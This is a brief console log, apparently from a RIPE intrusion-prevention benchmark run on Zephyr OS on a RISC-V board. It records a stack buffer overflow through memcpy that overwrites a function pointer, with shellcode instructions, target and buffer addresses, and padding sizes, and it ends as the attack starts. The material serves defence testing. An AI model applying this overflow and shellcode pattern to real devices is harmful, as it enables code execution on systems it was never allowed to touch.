*** Booting Zephyr OS build   ***
RIPE is alive! cv32a6_zybo
RIPE parameters:
technique	direct
inject param	shellcode
code pointer	funcptrstackvar
location	stack
function	memcpy
----------------
Shellcode instructions:
lui t1,  0x80004                     80004337
addi t1, t1, 0x608                   60830313
jalr t1                              000300e7
----------------
target_addr == 0x800110fc
buffer == 0x80010cd0
payload size == 1073
bytes to pad: 1056

overflow_ptr: 0x80010cd0
payload: 7C

Executing attack...